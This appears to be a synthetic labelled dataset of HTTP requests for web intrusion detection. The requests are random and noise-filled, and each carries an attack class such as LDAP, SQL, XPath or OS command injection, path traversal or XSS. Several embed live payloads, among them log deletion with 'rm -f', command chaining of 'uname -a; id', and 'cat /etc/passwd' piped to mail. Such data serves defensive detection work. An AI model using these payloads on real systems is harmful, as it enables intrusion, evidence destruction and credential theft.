GET /2Ha1WjL-vOi/tyba/aoeNr17-AnYBa/t3dLxH5W-6MChysZ@w/rmeeO-Awinnt/eteeRYa/fitt5ti/epz9Sz11gpZQYjQYTYP/oiSowwheTae2r/teha.php4?oD3rilew=%3C%21--++%23odbc++connect%3D%22Olp%2Ciir%2ChaiNn%22+++++++statement%3D%22select++++*+from+b%22--%3E&ts6lm70l=sU%258%3Cl3osaat&oYnoi4lwfIa=a%2Fi%26%5Du&aasAeAtRiaobnyw=RikhpAIdeeh&Ualailew8dqeeT9=882178&trA3eg7rttYdr=dnl&rebBnv6=13412&eet6LYiico=9&nweiidt=%5D%25nc&5_YnsU-evar=nHYlyrI_oVSG&eycdlIeeaiNEy=9097887&oEtegarorhrs=+AfnpN+%3CracnOt&fslidlagdogt=wOHt&osieetosfoi=7502745 HTTP/1.0
Host: 166.105.235.244
Connection: close
Accept: text/plain
Accept-Charset: windows-1253, iso-8859-8-i;q=0.1, windows-1257, cp-950;q=0.6, iso-8859-4;q=0.7
Accept-Encoding: *;q=0.8
Accept-Language: rtiad-r8i, otgws-se, naln-Oha9ttd;q=0.8, fn-te8io;q=0.8
Cookie2: $Version="855"
Date: Mon, 12 Jan 04 17:25:57 CET
If-Modified-Since: Mon, 16 Nov 09 06:52:58 UTC
If-Unmodified-Since: Sat, 15 Sep 07 21:32:30 UTC
If-Match: *
Authorization: NTLM U3RhYzI3aWV3bnJpd2lHaW5jdXNmdG5lYUFsczA3aWVyaWlyaWVjcw==
Referer: http://eie7msx.st/wrtth2/tlea/Unbl/uci1n/Offhe.nsf
TE: chunked,trailers,trailers
User-Agent: retodV (iF0_-hGS; nAZPJ7m@lY; oTbmcWU; nDcoRjD3J8)
Via: FTP/6.1 151.217.40.156

null

End - Id: 35011
Start - Id: 38714
class: LdapInjection
GET /tnosnnAeknmheHu/ettpved/wgp/1S26rUEtUbHYs0XqrN/mgpnodtf/nL5lhytzemaybyvrxoo/tdneEtImoa0wpds6ix.png?exaoe5Frv=sVocf6z4kxz&Kewindow.openIsQmetaupdatex=ta1DuUp&ra=6d%29%28%26%28objectClass+%3Ded*%29&Olwlchriae=+t&ta8=prturey%3Chtpassi&ZzN_vCcLK=2ilih&itllTdsl=132&w7hnn2hoyg=uAlfodetkss3drhgs&teymtn1glhar=%7C&oiyNEvhEheft4f=oL87HYKN-qz&hrs=04 HTTP/1.1
Host: www.onwafroe.net
Connection: close
Accept: */*;q=0.0
Accept-Charset: koi8;q=0.9, x-mac-turkish;q=0.4
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: max-age=05476
Client-ip: 95.161.31.177
Cookie: oe5=pS3H0jBsaH;3phomefyM.KT=hs_t2hhi;ysmye=y3d6processing-instructionln4sw;2armdr8aoe=usEcs0k0g
Cookie2: $Version="57"
Date: Tue, 07 Dec 04 12:30:24 CET
ETag: "IbfqiJ1ViGIz7bZFRsy"
Expect: 100-continue
From: ilrb@h5ihiwr.cz
If-Modified-Since: Fri, 30 Jan 09 22:32:43 CET
If-Unmodified-Since: Mon, 13 Apr 09 10:00:37 CET
If-Match: "bUEMNSvpAnphiU4zRZb"
If-None-Match: "KHfXERDYG1hC28rWN"
If-Range: Sun, 18 Apr 04 13:08:26 UTC
Max-Forwards: 097
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic cjY5b0hpZjp0aG1tYW90
Authorization: Digest response="B5FC1dca9c304aeAe95c704D71ffEB5c"
Range: 557810-
Referer: http://aCrApo.com/toms/rztOnRg.dll
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/1.5 (Machintosh; U; PPC Mac OS X 2.0; tp-9o; rv:0.2.9) Gecko/80803559
UA-CPU: 68000
UA-Disp: 115,677,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 094x3377
Via: HTTP/7.2 www.euAe.shtml, HTTP/6.7 72.200.125.131:6
Transfer-Encoding: gzip
Upgrade: xorad/3.4, wEIe/7.5, ten/7.9, acen/0.3
Warning: 342 www.9ohgn.htm:935 "Zduaeomxwo5fiu" "Fri, 23 Dec 05 04:28:42 CET"
X-Forwarded-For: 249.144.3.114
X-Serial-Number: 0697506678006
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38714
Start - Id: 38550
class: LdapInjection
GET /kF/3H1m4cdyO8qkHZyDr/dFxUcB14/k8E/nte/tta4EceorEki/L-yCL9madmin/u@/amSdPX1t2YVVD97cLuR/9qnz1sfwqsm1aoiet6nn/oEebs/bhiahsaaa.cfm?esf5ameUa=7&ozncnullJcUzbz=os+ae%3F%3B%3D5oedropc5uDIO&eR=isisn&eGOlr=soR%5DyhwheretInt5ajc&1rsdyruw4m16rBE=eie&eilh8ocR=rzl++insertvtfdei2+%3Djw&mg5qpteinir=hcoalssteiz6&ite6smqoIeig=47925&e5nph-B0=3875759&tmpXexecBHu=447077&oaeIirejs=wlk%29%28+++%7C+%28wh%3D*%29 HTTP/1.1
Host: 110.151.6.103
Connection: msSnr
Accept: application/x-tar, image/png;q=0.3, video/*;q=0.0
Accept-Charset: iso-8859-15;q=0.4, x-mac-greek;q=0.8, euc-cn, x-mac-japanese
Accept-Encoding: 
Accept-Language: lteAtt-eeOzttt;q=0.3, Ie9edp-09tnettt;q=0.8
Cache-Control: max-age=092
Client-ip: 137.169.169.214
Cookie: LiRmckNfromz=59723972;seeoiaod8eio=60;nMat=21
Cookie2: $Version="697"
Date: Sun, 30 Apr 06 03:30:44 UTC
ETag: W/"Mx20H@ckCBRko3Mhzz"
Expect: 100-continue
From: zttnih@4elXnnltkb.org
If-Modified-Since: Wed, 28 Feb 07 13:13:47 UTC
If-Unmodified-Since: Mon, 12 Apr 04 18:58:46 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 10 Feb 06 03:23:18 CET
Max-Forwards: 4996
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: NTLM Z2RpZWZmYTBGUG1yQWRpSUhuUnQ5SjNpbzNzSWxuZXJVYXRzdGlvZW1veGxJbGlh
Authorization: Digest nonce
Range: 5324-618,797-472771
Referer: /ni7ose/CM3l/Tiytet3u/uiaf.php3
TE: gzip
Trailer: If-Range
User-Agent: Mozilla/6.4 (X11; U; Open BSD i386 7.0; tt-so; rv:6.3.5) Gecko/81352724
UA-CPU: 68000
UA-Disp: 967,395,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8726x4401
Via: FTP/7.8 www.tthua.shtml, FTP/6.1 www.reaEhec.jpeg
Transfer-Encoding: deflate
Upgrade: ghm/2.7, nshsr/6.5, e5b/0.7, Iosom/6.6
Warning: 257 www.nege.css "tabeoWaOoehrErrknae" "Fri, 05 Jun 09 24:03:11 UTC"
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 30599
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38550
Start - Id: 42631
class: SqlInjection
GET /qaoFhu/dt9r8eRaoobmehat.jpeg?QGG_8Im=Ln&Tlogh@icDI=2790&selectSQ4=i50Qb&nchqUHpAiJZDQ=h5o&le=mfO&aite9m=49273&ZP0wgetserviceshUzV=%27+++++%2F**%2F+++OR+%2F**%2F+++++%27at%27+%3E+++++%27S&C2-ND=tyiobjectl3het%40o&xeahehhdmte92oz=e%5Dadminact%5D%28Hx%7Eye&xea=esdqb&se2g=sW%405UIUfjA&epsiseN4s7T6=gt7er HTTP/1.0
Host: www.0aceo.org
Connection: close
Accept: audio/basic;q=0.5, audio/basic;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: no-cache
Client-ip: 107.228.29.96
Cookie: r02s=tDb@;ib5sdms8srser=linDuy ntaccept ;JBIy=nae;dm6=1
Cookie2: $Version="78"
Date: Tue, 17 Mar 09 16:44:03 GMT
ETag: W/"6g2CgBxyxaxVfRuImC"
Expect: 100-continue
From: ik3a@umddedDee.biz
If-Modified-Since: Tue, 05 Dec 06 19:03:03 CET
If-Unmodified-Since: Mon, 09 Aug 04 22:26:17 GMT
If-Match: "zp4dB826AD8r00J"
If-None-Match: *
If-Range: Sat, 19 Nov 05 17:56:43 CET
Max-Forwards: 73
MIME-Version: 3.2
Pragma: o='pgm'
Proxy-Authorization: NTLM bW9tc2VkRWh1Y21SbnRPbmJ0ZUNhZXllVGVoMm9lbHRQZ3Vt
Authorization: NTLM ZWllZ29tdHM2aXNvQXRybW9meWNkdHR1bjdlYWlsc29lbXROa210dGk=
Range: 72326-9838
Referer: /ossyxue4/aDysds4x.css
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/2.3 (X11; U; Solaris 4.7; oU-i4; rv:6.5.4) Gecko/37651981
UA-CPU: PowerPC
UA-Disp: 4133,8176,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 4720x346
Via: 1.7 www.eo7ett4.js:3, sfhW/5.8 246.62.208.179
Transfer-Encoding: identity
Upgrade: xpnlin/0.7, nrmbin/0.8, 1tn7c/8.2, 0Hj/3.5, v2sh/4.3
Warning: 025 65.93.64.177:10262 "ancrneuyt" 
X-Forwarded-For: 32.163.55.249
X-Serial-Number: 81024686129
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42631
Start - Id: 46302
class: PathTransversal
GET /ie.jsp?Zgroup byAPt=39647088&v5ss9vetEatiUa=1080&iwEsuiiy=tWWY5J&dnrist34=q%3F&eutris=ivb%40BSbbDte%40&Bt5obTzyne3dion=c%2B%404&pPnyxnet6A8jnT=%5Bda&tnockw=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fdsip.conf&mlOlneN=anf%3De&Z7Rf_fFPGs.4=p1vue&dessn=0094 HTTP/1.0
Host: 8.86.252.251
Connection: keep-alive
Accept: application/x-tar, audio/*
Accept-Charset: windows-1257, utf-8, isiri-3342;q=0.5
Accept-Encoding: 
Accept-Language: nCi-beor;q=0.4, i-metuTb;q=0.5, n-soddej;q=0.6, bx-UN;q=0.8
Cache-Control: no-transform
Client-ip: 34.236.80.20
Cookie: 8RD@p_@=3107504;weplj=un n\n;sperlLshutdown=eqxp_naO)~ER6oalinktranrq;jentban=2088628350;orA1eyusSpOmegN=2H.qaJXUcJk
Cookie2: $Version="73"
Date: Sat, 02 Dec 06 15:19:53 CET
ETag: W/"l1XkmFGdW1ggoyh14oL"
Expect: uanyb
From: twei@aedq.de
If-Modified-Since: Wed, 21 Sep 05 18:56:29 GMT
If-Unmodified-Since: Sat, 16 Jan 10 07:12:14 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 12 Jul 09 10:55:43 CET
Max-Forwards: 94
MIME-Version: 8.6
Pragma: n=soBPs
Proxy-Authorization: Basic aGlFYTp3YXR0T24=
Authorization: nrns iewmrE=p1crees
Range: 5-,07-2
Referer: /2ETltn/etvShcg.cgi
TE: gzip;q=0.9,trailers,gzip;q=0.3
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.3 (Machintosh; U; PPC Mac OS X 9.7; hb-se; rv:3.8.9) Gecko/80637605
UA-CPU: 68000
UA-Disp: 542,0115,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 1380x824
Via: 3.7 www.yilftr.gif:2112, ait/3.7 103.159.168.69
Transfer-Encoding: identity
Upgrade: rri3/7.9, gpmees/3.2, aFeB/6.3
Warning: 165 170.166.64.203:01144 "oSte0enOhlsosme9awi" 
X-Forwarded-For: 207.118.108.52
X-Serial-Number: 0260257
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46302
Start - Id: 43436
class: OsCommanding
GET /artwfeibrrVneorsen/O@EZuZm9NDlmOZb/FImeta_ZkvEHHopGqm/dwdsr/aithcoyeqT/lsebt5ge/SVAS_/i37ZXZ9IVAKCZ/CGsxuQwlikeschild2tP.jpg?enett=othw&acjqhimaii=%250arm+++-f++%2Fvar%2Flog%2Fhttpd%2Faccess_log+++++%3B&hoe=fcNallsEtecotcu&sred1etHsofta=azi7ers&hnewhnxcovecle=sA1XwX HTTP/1.1
Host: 188.249.138.241:3
Connection: Tiborts
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: min-fresh=9
Client-ip: 230.11.35.165
Cookie: 9Ate9Ajphhnne1=ei>;QosEouuGntRspS=scriptneechildu;d8aqi=927368;buii=dmr;lnxdehiail=dcn8s8Diw1etSr
Cookie2: $Version="67"
Date: Sat, 26 Jul 08 23:30:51 GMT
ETag: "UylSwj-j1YsBiH-"
Expect: 100-continue
From: satt@ee2io.st
If-Modified-Since: Sun, 19 Feb 06 18:23:53 GMT
If-Unmodified-Since: Wed, 01 Mar 06 01:15:36 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2929
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Basic b3pzbndsbzptaWg5cW9k
Authorization: Digest realm
Range: 89-,6-,2-
Referer: http://aideo.com/igsmmN/iesrobep/nnnsgts.php4
TE: deflate,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.4 (X11; U; Open BSD i386 0.0; Ot-sa; rv:4.4.0) Gecko/13522456
UA-CPU: PowerPC
UA-Disp: 2710,0982,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 801x1629
Via: FTP/3.3 61.141.171.215
Transfer-Encoding: tsuC; 3rbx0n=pnccxaec
Upgrade: e2idw/6.5, 2eabf/4.4, hean/1.8
Warning: 068 www.nEtms.tiff:791 "hzcetNt0o1a8aftr" "Thu, 03 Dec 09 09:45:12 UTC"
X-Forwarded-For: 228.244.125.120
X-Serial-Number: 56802452036751769
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43436
Start - Id: 42961
class: OsCommanding
GET /eevHOts.msf?0Dp6bk=f4u%26stt0arasrvachild&rt=eh&Ua=if8a43I&eruseue8CRb=dfmtd08BvX1H&6uweuw=47&aeeotonth=umZ2.z3U.24U&beordusea5=nszoIayoca HTTP/1.1
Host: www.i1aeqvd1es.org
Connection: osiIIad
Accept: image/*, image/png
Accept-Charset: iso-8859-1, windows-1252, koi8
Accept-Encoding: gzip, identity;q=0.3
Accept-Language: *
Cache-Control: min-fresh=7
Client-ip: 94.144.227.182
Cookie: dleitvufrwnnh=NcCband~~tkfee?&+in;palhqaser=3412;oGEDP=; echo    ;   w  ; uname    -a       ;     id;rohAtee=388856
Cookie2: $Version="867"
Date: Sat, 26 Jul 08 24:44:07 CET
ETag: W/"mg6-z5rmN_exu3fsjr"
If-Modified-Since: Thu, 02 Apr 09 19:54:15 UTC
If-Match: "9dbwaVEppcCeNSEH8K"
If-None-Match: "@UsSjeumr3ha.y3iml"
Max-Forwards: 02
Pragma: no-cache
Referer: /momilgog/itIa/uOak8r.rar
TE: trailers,deflate;q=0.7
User-Agent: Mozilla/8.3 (Machintosh; U; PPC Mac OS X 9.0; ng-Na; rv:2.9.8) Gecko/18887115
UA-Disp: 8981,079,32
Via: HTTP/6.9 202.51.100.48
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42961
Start - Id: 43348
class: OsCommanding
GET /iHZv/tN6@mJA/zKvz7Ga97H/0aeEooe1no8sttrqezE/tlY7/l8.WXeQ/ula/Mng5OoiehsEws9re.nsf?gbadobnea=hdeleteoAc%5C+mailalocationhtacces5p&dei=d%3Cee%3Ect8&jYCHinsertlinkhexecprbW=560791961&Og=63607993&ii=t%2F%3Bpdrop&hdlN=Ity%27%24omifshutdownah&xeosdb=u%24owdtd&XunionAM=oops+++%3B++++cat++++%2Fetc%2Fpasswd++%7C++++mail+your%40ivbdC.com HTTP/1.0
Host: 177.13.243.221:80
Connection: keep-alive
Accept: */*
Accept-Charset: gb2312, shift_jis
Accept-Encoding: *;q=0.2
Accept-Language: IieT-go, shhI7uo-7iu0not, shtOosgt-toa;q=0.7, r0Q-qr7thaao;q=0.4, ee-ome
Cache-Control: no-cache
Client-ip: 39.142.10.38
Cookie: oyTmq1=:n;Elinwmll7=iNfte0zaunnhildagd;iuLclooBtri=usriiAs9;ro0igo0y=abgaoiC
Cookie2: $Version="05"
Date: Sat, 14 Jul 07 04:15:40 GMT
ETag: "ZtsaybANwxvciPTcmh"
Expect: 100-continue
From: tz687o@hnoaaeiE.it
If-Modified-Since: Sun, 01 Apr 07 01:49:14 CET
If-Unmodified-Since: Sun, 17 Oct 04 11:58:56 GMT
If-Match: "k8Ow660K2iP7Z1Taht4"
If-None-Match: "5Xm4-j6QM8jjuTm-lF"
If-Range: Tue, 28 Oct 08 04:25:18 CET
Max-Forwards: 74
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Digest nc=0dbF188e
Authorization: Digest response="e181AFEAF2da54167DFFFa8cb1bBAF3D"
Range: -3
Referer: /rorh4/Keee/gyc9tbi.tar
TE: trailers,trailers
Trailer: If-Range
User-Agent: okXLxOBnl http://www.iEct.it
UA-CPU: 68000
UA-Disp: 106,481,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 331x628
Via: 2.6 www.kf2rn0en.css:6624, 1.9 www.lavem.jpeg
Transfer-Encoding: identity
Upgrade: kxea/4.4, ru5/6.4, ttftd/1.9
Warning: 403 www.BhEtseNt.htm:881 "eios3eNlEnn4itt" 
X-Forwarded-For: 246.239.174.69
X-Serial-Number: 3733669583698502
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43348
Start - Id: 38627
class: LdapInjection
GET /myj/qCawrltg/resvh8iswaet7z/eO47/dterl5.css?McnlnJ=dml%5D%3E%28%3C8%292tesock_streamyevalm%29h50&su=cetIO%29%28%26%28objectClass++++%3D++++Hrys*%29&9ceTatPuhare4s=2172716&4t2xcy=0&yxp_eformQiI=catsamewheretr4c%5Detlhqsgroup+bystyle&eac=cLsd%3B4eur+csto5redn&zy=1676736291&toas4pnTmHc24=e&yoceoen8A5w4=250178&@7YT1hSJhZ4y=wYmz HTTP/1.0
Host: www.eyasogL.de
Connection: ec4d
Accept: */*
Accept-Charset: x-mac-roman, shift_jis, iso-8859-8
Accept-Encoding: gzip, identity;q=0.6, compress;q=0.7, identity;q=0.9, compress;q=0.6
Accept-Language: o9-5iolftn;q=0.8, ebJinaEa-nc, Yttst2a-eeD, o-gWkhh
Cache-Control: 1suf8ie=7cbtsm
Client-ip: 64.108.85.141
Cookie: ndu=58976;iecw25z=8296253953;latCL6mY-=630;iRvdeiNuuaej=9863;hbltCgBedOYDTeu=eVjqHmc6T
Cookie2: $Version="1"
Date: Sat, 15 Jan 05 19:33:10 CET
ETag: "drR02HaOX9i1.LlpNbB"
Expect: 100-continue
From: snRe@zteSps5r.net
If-Modified-Since: Fri, 18 Feb 05 03:24:27 CET
If-Unmodified-Since: Fri, 25 Nov 05 11:42:33 GMT
If-Match: "oi2eAACtN9W1lC7bi"
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 8.5
Pragma: eei9mes='h'
Proxy-Authorization: Digest cnonce="uda3ny"
Authorization: NTLM N2Fyc2EzaWFEaW42aVNjY3J2NG9nYXJiaWZ0bDRyZjlzbnpXYmVud09haQ==
Range: 907-3621,092-84571,369-460
Referer: http://tt5ennhr.ch/qvrt/uglrISn/htshrnyj.php
TE: trailers
Trailer: Accept
User-Agent: Mozilla/3.9 (X11; U; Open BSD i586 9.2; ze-ms; rv:2.9.9) Gecko/34323387
UA-CPU: StrongARM
UA-Disp: 397,637,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 601x4009
Via: HTTP/0.9 137.63.203.23, Raae/5.9 www.alf7.js, 8.4 69.166.218.179
Transfer-Encoding: if7ene; mijr=tfzy84
Upgrade: hiaeAa/4.4, r8ta/3.6, rte3z/8.6, iadrea/0.5, ia5gs/1.7
Warning: 385 www.ietrrth1.htm "wefuh94ogoiYectles" 
X-Forwarded-For: 126.96.147.176
X-Serial-Number: 325446948
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38627
Start - Id: 49122
class: XPathInjection
GET /5SmIDZcdh@_n9T/ozn/bureoswpre7e4diVraye/zmuSincer/h8oshdeega5gU.aspx?HNGnvBUNeba=htssperlai4i++lcnc&inlZjg6havingw0U=Ee5m%25u&Tris19ReneidEbe=tae%7El&hcnteab1to=nEFAYD8&1eesi1es=213992&VwLdocument@QS=5roai%27+or+++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28++++%29%3D%28%28+i++%2B++++j++++%2B++k++%2B++++l+%2B+1%29%5D+%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or+%271hinaarr%27+%3D+++%27++++mhh%27+++++or&oacceptggperl=470412&ohn7Lce6eb=036126&azrosbcoSff=%3B%5C%25lbi6o&oStggtnr=script6&etxpooenmgHa=5+eii%3Fleittth+&d4jMQo=w-d2 HTTP/1.1
Host: 70.64.141.124
Connection: close
Accept: video/quicktime;q=0.3
Accept-Charset: x-mac-greek, euc-jp;q=0.0, koi8, x-mac-japanese;q=0.8
Accept-Encoding: compress, gzip;q=0.9, gzip, compress;q=0.8
Accept-Language: *
Cache-Control: max-stale=5
Client-ip: 194.231.244.174
Cookie: inmNrUhiiIt7ed=ktmp)ss%eobject|ssdsnb=oy>;wgetrApMiconnectK=iesx
Cookie2: $Version="259"
Date: Fri, 23 Apr 04 16:49:56 CET
ETag: "vPp0o9iOZjK@583"
Expect: 100-continue
From: tiaecs@atrtrnsru.ch
If-Modified-Since: Thu, 20 Jul 06 07:50:28 GMT
If-Unmodified-Since: Sun, 09 Oct 05 14:08:05 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: 4dqt csae2edi=scth
Range: 245-5,78-,7820-
Referer: http://iNcecefe.uk/ahoO/Edrzoaa/asioes.wav
TE: gzip;q=0.4,chunked
Trailer: Host
User-Agent: Mozilla/4.7 (Windows; U; WinNT 1.0; iT-sa; rv:5.6.5) Gecko/67218574
UA-CPU: StrongARM
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 468x973
Via: 9.4 105.145.37.4:8818, HTTP/3.1 67.67.54.173, 1.6 www.EasavI.png
Transfer-Encoding: deflate
Upgrade: enn72/7.1, EYeuT/2.5, saodes/7.2
Warning: 604 www.ofriesai.html "lf1behhu" 
X-Forwarded-For: 91.195.205.35
X-Serial-Number: 68685203672775561
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 49122
Start - Id: 38259
class: LdapInjection
GET /ll/VgJ84s.ZFYhwget1Y/5xbK63allG2BEKu/r0NGx7mfLJIz@fj7Z5/eiealslreeNmtncd/Rlogov3/gR2t2K29IT/amiisec1iz.tiff?@wntg-Ve.T=0228543386&FRR7=eF%29%28%26%28objectClass+++%3D+++pos*%29&pkskgtnhvla=19623477&thtweo=UeOqduoL2s&ir3y=25&GSFQaccess_logP=32&2aypNhmaemGuye=344711&nrjhagiaoj=9156364&5ceaHceO=21&sock_streamnodedelete1ZAJWv=r+tcat+&pld0dtehjet=1027 HTTP/1.1
Host: www.ahlj.cz:80
Connection: enoaiit
Accept: */*;q=0.4
Accept-Charset: iso-8859-15, euc-kr;q=0.0, x-mac-greek, x-mac-chinesetrad, iso-2022-kr
Accept-Encoding: compress
Accept-Language: *
Cache-Control: max-age=40
Client-ip: 113.81.106.78
Cookie: Urq=9154;Ka=tenzihrrr82tVvu9;trfr6ny=spj5nviw;wglnL0acr=08879;hiav=htbpesei3iinssOrc
Cookie2: $Version="57"
Date: Fri, 25 Apr 08 20:19:46 CET
ETag: W/"vtsbqI40-WbGIOGz"
Expect: 52cde=otinosw
From: Eorust@uthn0.it
If-Modified-Since: Thu, 25 Nov 04 17:35:08 GMT
If-Unmodified-Since: Thu, 11 Nov 04 11:58:07 GMT
If-Match: *
If-None-Match: *
If-Range: "GNU9OR5X2j67sIFe6d3r"
Max-Forwards: 4
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: NTLM ZXJydTFhY2xuaHV5YTBsYWFlZHVlbmF3aXJkbnV0aW10YQ==
Authorization: hb5aoI r4e5=HNca
Range: -23
Referer: /alnacbf.gif
TE: chunked,deflate
Trailer: Proxy-Authorization
User-Agent: ceaimo/9.4.5.8
UA-CPU: PowerPC
UA-Disp: 087,798,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 4041x0261
Via: 5.6 www.hety.css, 0.4 97.201.217.41:83070, aad/6.8 www.vmaei.gif
Transfer-Encoding: ewlnz; yDtn=edsrgcmY
Upgrade: eddcT/3.3, roas/0.6
Warning: 420 www.hNfxAea.shtml "ha5earnepwc" "Thu, 20 Jan 05 10:55:49 UTC"
X-Forwarded-For: 169.43.23.55
X-Serial-Number: 05796287611
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38259
Start - Id: 46599
class: XSS
GET /2AhSsock_streamwnvcat/hQGjVvV-4ONeFZJTEu/Ptn5yueitdl6/tU3Q/ehcejd30nouenorn6/aentuhMtwhadacy/spiyklrlmI/eoXbq1U05PHID/wpwNONJtboHdRxIHpvwS/eY4Oh76JgBjq3o/g1M_XpYxU4LVsMhEfEd.htm?anxpedoe=18916757&towiatapt=men9tvbscriptxuiEas&0i1u=lDem&5xA%u21UkSaq=uirmpr&vala=14&ogs9aGtits7ehEi=oeU+iae1andhbodyl%3Bltr%27i HTTP/1.1
Host: www.aNw2nnlhal.org:960
Connection: optexey
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: <a     href    =  " javas&#99;ript&#35;[alert   ('iz4ogWOa');]   "  >
Accept-Language: *
Cache-Control: no-transform
Client-ip: 85.69.51.81
Cookie: oyjeNilabsexds=78642;a0ueonh6g=dwOqen9ame5iao;nte25rSbnt9usa=ur
Cookie2: $Version="8"
Date: Thu, 24 Sep 09 01:12:15 UTC
ETag: "9zn7eT01akETkZC"
Expect: 100-continue
From: dAmNr@octimiksy.gov
If-Modified-Since: Wed, 07 Apr 10 24:18:11 GMT
If-Unmodified-Since: Sun, 07 May 06 16:07:36 UTC
If-Match: *
If-None-Match: *
If-Range: "FJKz8uFZ9rm1590cR"
Max-Forwards: 287
MIME-Version: 3.4
Pragma: nf='i'
Proxy-Authorization: Digest algorithm=mtihf
Authorization: Basic aWZhZDpybmxuZmFh
Range: 0493-406438
Referer: /rasE.mdb
TE: chunked;q=0.1
Trailer: Accept-Language
User-Agent: Mozilla/8.5 (Machintosh; U; Mac OS X 2.6; nr-es; rv:5.7.5) Gecko/09427601
UA-CPU: Sparc
UA-Disp: 5748,579,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 991x9240
Via: 1.2 www.n9ilcoa.htm:763
Transfer-Encoding: identity
Upgrade: Ers2te/0.8, damj/3.3, yenst5/7.3, Asbtf/7.1
Warning: 814 www.hsOonn.js "iker" "Fri, 28 Jul 06 12:52:58 CET"
X-Forwarded-For: 182.65.143.99
X-Serial-Number: 015353495234
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46599
Start - Id: 35909
class: XPathInjection
PUT /sGnJG3hMLXnI/H4ver/e74futeneiec8sl6Rl/bghuwY9_/bazo/pUsTMN.A/fui8tw/tISzOagYAFcT20n/1desasia6/7xe/5sQAL6dqzewYdN39.shtml? HTTP/1.0
Content-Length: 55
Content-Language: b3iiio,i2r,pyqyn4js
Content-Encoding: identity
Content-Location: http://gl5qers.uk/rdooitsr/6nklu/n95nleo/netos2On.js
Content-MD5: dnRhd2JyTWVpN2Vscmlscg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 18 Jun 04 14:20:17 GMT
Last-Modified: Thu, 30 Nov 06 16:43:49 UTC
Host: www.n3admtthAk.fr:946
Connection: tryylri
Accept: */*;q=0.3
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.9
Accept-Language: xnr-ymn;q=0.8, Svoe-ldsgOiit;q=0.2, uddobs-t;q=0.4, 5ah7m9-n9coio;q=0.3
Cache-Control: max-stale=196
Client-ip: 108.233.62.122
Cookie: snqsp=sdfr8;0e=gae2io'   or   1<    uha2bs/4nC/eGyHc/child::text()[position()=139]    or  'cnddBb'=   '
Cookie2: $Version="45"
Date: Thu, 20 May 04 07:59:43 GMT
ETag: "LUUzBE7dw1ESRGM"
Expect: hceValh
From: tarau@ei6ci.com
If-Modified-Since: Fri, 22 Jun 07 19:43:46 CET
If-Unmodified-Since: Fri, 15 Jan 10 13:08:53 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 23 Aug 05 07:59:10 UTC
Max-Forwards: 85
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: Digest nc=b4b6a8b5
Authorization: NTLM MlR0OWh1MTB0ZGJsM21hZW9pdWhNbmd0b2VNbmE1aHRlczRzdW1UcHNydG83aA==
Range: 9-
Referer: /uNRntoow/ebrOpNe/aeotg.jsp
TE: chunked,gzip;q=0.1
User-Agent: Mozilla/1.0 (Windows; U; Win 9x 8.3; uh-tn; rv:7.1.8) Gecko/30757732
UA-Color: color8
Via: 4.6 www.rinttt.jpg, Ito/9.4 www.Estt.html
Transfer-Encoding: identity
Upgrade: uinz/0.1, ccQ/0.0, nNa/8.7, tss/5.6
X-Serial-Number: 56681773
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

